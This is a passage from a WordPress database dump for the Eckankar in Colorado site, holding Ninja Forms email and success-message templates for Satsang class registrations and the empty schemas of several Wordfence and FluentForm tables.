solid #cccccc;border-spacing:0;text-align:center;\">              <tbody>                <tr>                  <td style=\"padding: 20px 0px; background: white none repeat scroll 0% 0%; font-size: 50px; line-height: 10px; font-weight: 600;\" align=\"center\"><span style=\"color: #4f759b;\">Admin                      Notification<br>                    </span><span style=\"color: #666666;\"> </span></td>                </tr>                <tr>                  <td style=\"padding:36px 30px 42px 30px;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0; margin-top: -25px;\">                      <tbody>                        <tr>                          <td style=\"padding:0 0 20px 0;color:#153643; \">                            <p style=\"font-size: 20px; margin: 0px 0px 20px; font-family: Arial,sans-serif; text-align: center;font-size:30px; color:#f28a27;\"><strong>New                                <strong><span id=\"nf-drawer-content\" style=\"color: #4f759b;\"><span></span></span></strong></strong></p>                            <strong><strong> </strong>                              <p style=\"color: #23507d;text-align:center;font-size:23px;\" class=\"nf-setting-groups\"><strong><span class=\"nf-field-settings\">{form:title}</span><span>                                  </span>Form Submission</strong></p>                            </strong>                            <div style=\"text-align: center;\"><strong> This form                                was generated from a user submission on the <em>Eckankar                                  In Colorado</em> website. You are receiving                                this submission because you are listed as a                                contact for the <em>Loveland ECK Leadership                                  organization</em>.</strong><br>                              <strong> <strong></strong></strong><br>                              <strong><strong> The following person has                                  requested contact with an ECK representative.                                  Here is the information that <span style=\"color: #666666\">{field:textbox_142}                                    {field:lastname_143}</span> has submitted:</strong>                              </strong></div>                            <strong>                              <p></p>                            </strong></td>                        </tr>                        <tr>                          <td style=\"padding:0;\">                            <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                              <tbody>                                <tr>                                  <td style=\"width:260px;padding:0;vertical-align:top;color:#153643;\">                                    <table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">                                      <tbody>                                        <tr>                                          <td style=\"background-color: #efefef;padding: 10px;border: 1px solid #cccccc; text-align:left;\" valign=\"top\" align=\"left; \">                                            <p><span style=\"color: #333333\"><strong>FIRST                                                  NAME:</strong>                                                {field:textbox_142}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>LAST                                                  NAME:</strong>                                                {field:lastname_143}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>EMAIL:</strong>                                                {field:email_144}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong>                                                {field:phone_145}</span><br>                                              <br>                                              <span style=\"color: #333333\"><strong>LOCAL                                                  AREA:</strong>                                                {field:listselect_146}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>PERSON                                                  YOU WOULD LIKE TO                                                  CONTACT:&nbsp;</strong>{field:select_the_person_you_would_like_to_contact_1613166666321}</span></p>                                            <p><span style=\"color: #333333\"><strong>MESSAGE:                                                  </strong>{field:textarea_150}</span></p>                                          </td>                                        </tr>                                      </tbody>                                    </table>                                  </td>                                </tr>                              </tbody>                            </table>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>                <tr>                  <td style=\"padding:30px;background:#7393B3;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;font-size:16px;font-family:Arial,sans-serif;\">                      <tbody>                        <tr>                          <td style=\"padding:0;\" align=\"center\">                            <p style=\"margin:0;font-size:16px;line-height:22px;font-family:Arial,sans-serif;color:#ffffff;\">If                              you have any questions regarding the origin of                              this form, please feel free to contact the                              Eckankar In Colorado webmaster: <br>                              <span style=\"color #ffffff;\">                                webmaster@eckankar-colorado.org</span><br>                              <br>                              <a href=\"https://www.eckankar-colorado.org\" style=\"color: #ffffff;\">Eckankar                                In Colorado</a> </p>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>              </tbody>            </table>          </td>        </tr>      </tbody>    </table>      '),(7673,255,'drawerDisabled','','drawerDisabled',''),(7674,258,'message','{all_fields_table}','message','{all_fields_table}'),(7675,258,'order','2','order','2'),(7676,258,'payment_gateways','','payment_gateways',''),(7677,258,'payment_total','0','payment_total','0'),(7678,258,'tag','','tag',''),(7679,258,'email_subject','New Satsang Class Registration','email_subject','New Satsang Class Registration'),(7680,258,'from_name','','from_name',''),(7681,258,'from_address','{system:admin_email}','from_address','{system:admin_email}'),(7682,258,'reply_to','','reply_to',''),(7683,258,'email_format','html','email_format','html'),(7684,258,'cc','','cc',''),(7685,258,'bcc','','bcc',''),(7686,258,'attach_csv','','attach_csv',''),(7687,258,'parent_id','37','parent_id','37'),(7688,258,'email_message_plain','','email_message_plain',''),(7689,258,'drawerDisabled','','drawerDisabled',''),(7690,258,'title','','title',''),(7691,258,'key','','key',''),(7692,258,'type','email','type','email'),(7693,258,'active','1','active','1'),(7694,258,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(7695,258,'label','User Email Confirmation','label','User Email Confirmation'),(7696,258,'objectType','Action','objectType','Action'),(7697,258,'objectDomain','actions','objectDomain','actions'),(7698,258,'editActive','','editActive',''),(7699,258,'to','{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}','to','{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}'),(7700,258,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),(7701,258,'email_message','<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"padding-top: 0px; padding-bottom: -10px; background-color: rgba(239, 243, 250, 0.41);\"><div class=\"col-md-12 col-sm-12 col-xs-12\" style=\"border-color: #af5908; border-width: 3px; border-image: none 100% / 1 / 0 stretch; background-color: #fcfcfc;\"><h3 class=\"\" style=\"font-size: 40px; text-transform: capitalize; color: #23507d; margin-top: 0px; margin-bottom: -30px; font-family: Raleway; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Eckankar In Colorado</h3>\n<p class=\"\" style=\"font-size: 26px; margin-bottom: 0px; font-family: Open Sans; font-weight: 300; color: #23507d; font-style: italic;\" data-font-style=\"italic\" data-font-family=\"Open Sans\" data-font-weight=\"300\"><strong>Web Submission Confirmation</strong></p>\n<p class=\"\" style=\"font-size: 27px; margin-bottom: 0px; color: #ad5605; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"text-decoration: underline;\">Satsang Class Registration -- 2022-2023<br></span></p>\n<p class=\"\" style=\"font-size: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hello {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711},</p>\n<p class=\"\" style=\"font-size: 18px; margin-top: -13px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">You have registered for a new ECK Satsang Class. Great to have you onboard! The Arahata for the class will be contacting you before the class starts. <br><br><em>Below is the information that you have submitted:</em></p>\n<table style=\"border-collapse: collapse; width: 72.8705%; border: 2px solid #d4d2d2;\">\n<tbody>\n<tr>\n<td style=\"width: 100%; background-color: #eeeeee; padding: 20px;\"><p class=\"\" style=\"font-size: 16px;\"><strong>First Name: &nbsp;</strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711}<strong><br></strong></p>\n<p class=\"\" style=\"font-size: 16px;\"><strong>Last Name:&nbsp; </strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}<strong><br></strong></p>\n<p class=\"\" style=\"font-size: 16px;\"><strong>Email:&nbsp; </strong>{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}<strong><br></strong></p>\n<p class=\"\" style=\"font-size: 16px;\"><strong>Phone:&nbsp; </strong>{field:less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498}<strong><br></strong></p>\n<p class=\"\" style=\"font-size: 16px;\"><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\"><strong>Class Chosen</strong><strong>: </strong>{field:select_one_class_per_registrant_1658696832524}</span></span></span><strong></strong><strong><br></strong></p>\n<p class=\"\" style=\"font-size: 16px;\"><strong>Optional Message:&nbsp; </strong>{field:enter_message_for_arahata_optional_1599679737041}</p>\n</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\" style=\"font-size: 15px;\">If you have any questions regarding the origin of this form, please feel free to contact the <a href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado </a>webmaster: webmaster@eckankar-colorado.org</p>\n</div>\n</div>\n</div>\n</div>','email_message','<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"padding-top: 0px; padding-bottom: -10px; background-color: rgba(239, 243, 250, 0.41);\"><div class=\"col-md-12 col-sm-12 col-xs-12\" style=\"border-color: #af5908; border-width: 3px; border-image: none 100% / 1 / 0 stretch; background-color: #fcfcfc;\"><h3 class=\"\" style=\"font-size: 40px; text-transform: capitalize; color: #23507d; margin-top: 0px; margin-bottom: -30px; font-family: Raleway; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Eckankar In Colorado</h3>\n<p class=\"\" style=\"font-size: 26px; margin-bottom: 0px; font-family: Open Sans; font-weight: 300; color: #23507d; font-style: italic;\" data-font-style=\"italic\" data-font-family=\"Open Sans\" data-font-weight=\"300\"><strong>Web Submission Confirmation</strong></p>\n<p class=\"\" style=\"font-size: 27px; margin-bottom: 0px; color: #ad5605; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"text-decoration: underline;\">Satsang Class Registration -- 2022-2023<br></span></p>\n<p class=\"\" style=\"font-size: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hello {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711},</p>\n<p class=\"\" style=\"font-size: 18px; margin-top: -13px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">You have registered for a new ECK Satsang Class. Great to have you onboard! The Arahata for the class will be contacting you before the class starts. <br><br><em>Below is the information that you have submitted:</em></p>\n<table style=\"border-collapse: collapse; width: 72.8705%; border: 2px solid #d4d2d2;\">\n<tbody>\n<tr>\n<td style=\"width: 100%; background-color: #eeeeee; padding: 20px;\"><p class=\"\" style=\"font-size: 16px;\"><strong>First Name: &nbsp;</strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711}<strong><br></strong></p>\n<p class=\"\" style=\"font-size: 16px;\"><strong>Last Name:&nbsp; </strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}<strong><br></strong></p>\n<p class=\"\" style=\"font-size: 16px;\"><strong>Email:&nbsp; </strong>{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}<strong><br></strong></p>\n<p class=\"\" style=\"font-size: 16px;\"><strong>Phone:&nbsp; </strong>{field:less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498}<strong><br></strong></p>\n<p class=\"\" style=\"font-size: 16px;\"><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\"><strong>Class Chosen</strong><strong>: </strong>{field:select_one_class_per_registrant_1658696832524}</span></span></span><strong></strong><strong><br></strong></p>\n<p class=\"\" style=\"font-size: 16px;\"><strong>Optional Message:&nbsp; </strong>{field:enter_message_for_arahata_optional_1599679737041}</p>\n</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\" style=\"font-size: 15px;\">If you have any questions regarding the origin of this form, please feel free to contact the <a href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado </a>webmaster: webmaster@eckankar-colorado.org</p>\n</div>\n</div>\n</div>\n</div>'),(7702,259,'title','','title',''),(7703,259,'key','','key',''),(7704,259,'type','save','type','save'),(7705,259,'active','1','active','1'),(7706,259,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(7707,259,'label','Store Submission','label','Store Submission'),(7708,259,'objectType','Action','objectType','Action'),(7709,259,'objectDomain','actions','objectDomain','actions'),(7710,259,'editActive','','editActive',''),(7711,259,'order','3','order','3'),(7712,259,'payment_gateways','','payment_gateways',''),(7713,259,'payment_total','0','payment_total','0'),(7714,259,'tag','','tag',''),(7715,259,'to','{wp:admin_email}','to','{wp:admin_email}'),(7716,259,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(7717,259,'email_message','{fields_table}','email_message','{fields_table}'),(7718,259,'from_name','','from_name',''),(7719,259,'from_address','','from_address',''),(7720,259,'reply_to','','reply_to',''),(7721,259,'email_format','html','email_format','html'),(7722,259,'cc','','cc',''),(7723,259,'bcc','','bcc',''),(7724,259,'attach_csv','','attach_csv',''),(7725,259,'redirect_url','','redirect_url',''),(7726,259,'parent_id','37','parent_id','37'),(7727,259,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(7728,259,'email_message_plain','','email_message_plain',''),(7729,259,'submitter_email','','submitter_email',''),(7730,259,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(7731,259,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(7732,259,'set_subs_to_expire','0','set_subs_to_expire','0'),(7733,259,'subs_expire_time','90','subs_expire_time','90'),(7734,259,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(7735,260,'title','','title',''),(7736,260,'key','','key',''),(7737,260,'type','email','type','email'),(7738,260,'active','1','active','1'),(7739,260,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(7740,260,'label','Admin Email Notification','label','Admin Email Notification'),(7741,260,'objectType','Action','objectType','Action'),(7742,260,'objectDomain','actions','objectDomain','actions'),(7743,260,'editActive','','editActive',''),(7744,260,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(7745,260,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),(7746,260,'message','{all_fields_table}','message','{all_fields_table}'),(7747,260,'order','2','order','2'),(7748,260,'payment_gateways','','payment_gateways',''),(7749,260,'payment_total','0','payment_total','0'),(7750,260,'tag','','tag',''),(7751,260,'email_subject','New Event Registration from {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711} {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}','email_subject','New Event Registration from {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711} {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}'),(7752,260,'from_name','','from_name',''),(7753,260,'from_address','','from_address',''),(7754,260,'reply_to','{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}','reply_to','{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}'),(7755,260,'email_format','html','email_format','html'),(7756,260,'cc','','cc',''),(7757,260,'bcc','','bcc',''),(7758,260,'attach_csv','','attach_csv',''),(7759,260,'parent_id','37','parent_id','37'),(7760,260,'email_message_plain','','email_message_plain',''),(7761,260,'drawerDisabled','','drawerDisabled',''),(7762,260,'email_message','<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"padding-top: 0px; padding-bottom: -10px; background-color: rgba(239, 243, 250, 0.41);\"><div class=\"col-md-12 col-sm-12 col-xs-12\" style=\"border-color: #af5908; border-width: 3px; border-image: none 100% / 1 / 0 stretch; background-color: #fcfcfc;\"><h3 class=\"\" style=\"font-size: 40px; text-transform: capitalize; color: #23507d; margin-top: 0px; margin-bottom: -30px; font-family: Raleway; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Eckankar In Colorado</h3><p class=\"\" style=\"font-size: 26px; margin-bottom: 0px; font-family: Open Sans; font-weight: 300; color: #23507d; font-style: italic;\" data-font-style=\"italic\" data-font-family=\"Open Sans\" data-font-weight=\"300\"><strong>New Web Submission</strong></p><p class=\"\" style=\"font-size: 27px; margin-bottom: 0px; color: #ad5605; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"text-decoration: underline;\">Satsang Class Registration - 2022-2023<br></span></p><h3 class=\"\" style=\"text-transform: capitalize; font-family: Open Sans; font-weight: 400; font-size: 22px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You Have A New Web Submission from: <span style=\"color: #727171; font-weight: bold;\">{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711} {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}</span></h3><p class=\"\" style=\"font-size: 16px; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This form was generated by a user on the Eckankar In Colorado website.<br>Below is the information that the user has submitted:</p><table style=\"border-collapse: collapse; width: 74.2518%;\"><tbody><tr><td style=\"width: 100%; background-color: #eeeeee; padding: 20px;\"><p class=\"\" style=\"font-size: 16px;\"><strong>First Name: &nbsp;</strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Last Name:&nbsp; </strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Email:&nbsp; </strong>{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Phone:&nbsp; </strong>{field:less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Class Chosen</strong><strong>: </strong>{field:select_one_class_per_registrant_1658696832524}<strong><br><br>Optional Message:&nbsp; </strong>{field:enter_message_for_arahata_optional_1599679737041}</p></td></tr></tbody></table></div></div><div class=\"row\" style=\"padding-bottom: 0px;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\" style=\"font-size: 14px;\">If you have any questions regarding the origin of this form, please feel free to contact the <a href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado</a><br>webmaster: webmaster@eckankar-colorado.org</p></div></div></div></div>','email_message','<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"padding-top: 0px; padding-bottom: -10px; background-color: rgba(239, 243, 250, 0.41);\"><div class=\"col-md-12 col-sm-12 col-xs-12\" style=\"border-color: #af5908; border-width: 3px; border-image: none 100% / 1 / 0 stretch; background-color: #fcfcfc;\"><h3 class=\"\" style=\"font-size: 40px; text-transform: capitalize; color: #23507d; margin-top: 0px; margin-bottom: -30px; font-family: Raleway; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Eckankar In Colorado</h3><p class=\"\" style=\"font-size: 26px; margin-bottom: 0px; font-family: Open Sans; font-weight: 300; color: #23507d; font-style: italic;\" data-font-style=\"italic\" data-font-family=\"Open Sans\" data-font-weight=\"300\"><strong>New Web Submission</strong></p><p class=\"\" style=\"font-size: 27px; margin-bottom: 0px; color: #ad5605; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"text-decoration: underline;\">Satsang Class Registration - 2022-2023<br></span></p><h3 class=\"\" style=\"text-transform: capitalize; font-family: Open Sans; font-weight: 400; font-size: 22px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You Have A New Web Submission from: <span style=\"color: #727171; font-weight: bold;\">{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711} {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}</span></h3><p class=\"\" style=\"font-size: 16px; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This form was generated by a user on the Eckankar In Colorado website.<br>Below is the information that the user has submitted:</p><table style=\"border-collapse: collapse; width: 74.2518%;\"><tbody><tr><td style=\"width: 100%; background-color: #eeeeee; padding: 20px;\"><p class=\"\" style=\"font-size: 16px;\"><strong>First Name: &nbsp;</strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Last Name:&nbsp; </strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Email:&nbsp; </strong>{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Phone:&nbsp; </strong>{field:less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Class Chosen</strong><strong>: </strong>{field:select_one_class_per_registrant_1658696832524}<strong><br><br>Optional Message:&nbsp; </strong>{field:enter_message_for_arahata_optional_1599679737041}</p></td></tr></tbody></table></div></div><div class=\"row\" style=\"padding-bottom: 0px;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\" style=\"font-size: 14px;\">If you have any questions regarding the origin of this form, please feel free to contact the <a href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado</a><br>webmaster: webmaster@eckankar-colorado.org</p></div></div></div></div>'),(7763,261,'title','','title',''),(7764,261,'key','','key',''),(7765,261,'type','successmessage','type','successmessage'),(7766,261,'active','1','active','1'),(7767,261,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(7768,261,'label','Success Message','label','Success Message'),(7769,261,'objectType','Action','objectType','Action'),(7770,261,'objectDomain','actions','objectDomain','actions'),(7771,261,'editActive','','editActive',''),(7772,261,'message','Your form has been successfully submitted.','message','Your form has been successfully submitted.'),(7773,261,'order','1','order','1'),(7774,261,'payment_gateways','','payment_gateways',''),(7775,261,'payment_total','0','payment_total','0'),(7776,261,'tag','','tag',''),(7777,261,'to','{wp:admin_email}','to','{wp:admin_email}'),(7778,261,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(7779,261,'email_message','{fields_table}','email_message','{fields_table}'),(7780,261,'from_name','','from_name',''),(7781,261,'from_address','','from_address',''),(7782,261,'reply_to','','reply_to',''),(7783,261,'email_format','html','email_format','html'),(7784,261,'cc','','cc',''),(7785,261,'bcc','','bcc',''),(7786,261,'attach_csv','','attach_csv',''),(7787,261,'redirect_url','','redirect_url',''),(7788,261,'success_msg','<div class=\"boldgrid-section color1-background-color color-1-text-contrast bg-background-color\"><div class=\"container\"><div class=\"row\" style=\"padding-top: 100px; padding-bottom: 100px;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\" style=\"text-align: center; color: #23507d; font-size: 31px; font-family: Open Sans; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Thank You For Registering!</p><p class=\"\" style=\"text-align: center; font-size: 21px; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">We appreciate you taking the time to complete your Satsang Class registration.<br>The Arahata for the class you have chosen will be contacting you before the class starts.</p></div></div></div></div>','success_msg','<div class=\"boldgrid-section color1-background-color color-1-text-contrast bg-background-color\"><div class=\"container\"><div class=\"row\" style=\"padding-top: 100px; padding-bottom: 100px;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\" style=\"text-align: center; color: #23507d; font-size: 31px; font-family: Open Sans; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Thank You For Registering!</p><p class=\"\" style=\"text-align: center; font-size: 21px; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">We appreciate you taking the time to complete your Satsang Class registration.<br>The Arahata for the class you have chosen will be contacting you before the class starts.</p></div></div></div></div>'),(7789,261,'parent_id','37','parent_id','37'),(7790,261,'email_message_plain','','email_message_plain',''),(7791,261,'submitter_email','','submitter_email',''),(7792,261,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(7793,261,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(7794,261,'set_subs_to_expire','0','set_subs_to_expire','0'),(7795,261,'subs_expire_time','90','subs_expire_time','90'),(7796,261,'drawerDisabled','','drawerDisabled','');
/*!40000 ALTER TABLE `wpcl_nf3_action_meta` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_nf3_action_meta` with 5772 row(s)
--

--
-- Table structure for table `wpcl_wfls_role_counts`
--

DROP TABLE IF EXISTS `wpcl_wfls_role_counts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wfls_role_counts` (
  `serialized_roles` varbinary(255) NOT NULL,
  `two_factor_inactive` tinyint(1) NOT NULL,
  `user_count` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`serialized_roles`,`two_factor_inactive`)
) ENGINE=MEMORY DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wfls_role_counts`
--

LOCK TABLES `wpcl_wfls_role_counts` WRITE;
/*!40000 ALTER TABLE `wpcl_wfls_role_counts` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_wfls_role_counts` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wfls_role_counts` with 0 row(s)
--

--
-- Table structure for table `wpcl_wflivetraffichuman`
--

DROP TABLE IF EXISTS `wpcl_wflivetraffichuman`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wflivetraffichuman` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `identifier` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `expiration` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`,`identifier`),
  KEY `expiration` (`expiration`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wflivetraffichuman`
--

LOCK TABLES `wpcl_wflivetraffichuman` WRITE;
/*!40000 ALTER TABLE `wpcl_wflivetraffichuman` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_wflivetraffichuman` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wflivetraffichuman` with 0 row(s)
--

--
-- Table structure for table `wpcl_wfwaffailures`
--

DROP TABLE IF EXISTS `wpcl_wfwaffailures`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wfwaffailures` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `throwable` text NOT NULL,
  `rule_id` int(10) unsigned DEFAULT NULL,
  `timestamp` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wfwaffailures`
--

LOCK TABLES `wpcl_wfwaffailures` WRITE;
/*!40000 ALTER TABLE `wpcl_wfwaffailures` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_wfwaffailures` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wfwaffailures` with 0 row(s)
--

--
-- Table structure for table `wpcl_fluentform_submission_meta`
--

DROP TABLE IF EXISTS `wpcl_fluentform_submission_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_fluentform_submission_meta` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `response_id` bigint(20) unsigned DEFAULT NULL,
  `form_id` int(10) unsigned DEFAULT NULL,
  `meta_key` varchar(45) DEFAULT NULL,
  `value` longtext DEFAULT NULL,
  `status` varchar(45) DEFAULT NULL,
  `user_id` int(10) unsigned DEFAULT NULL,
  `name` varchar(45) DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
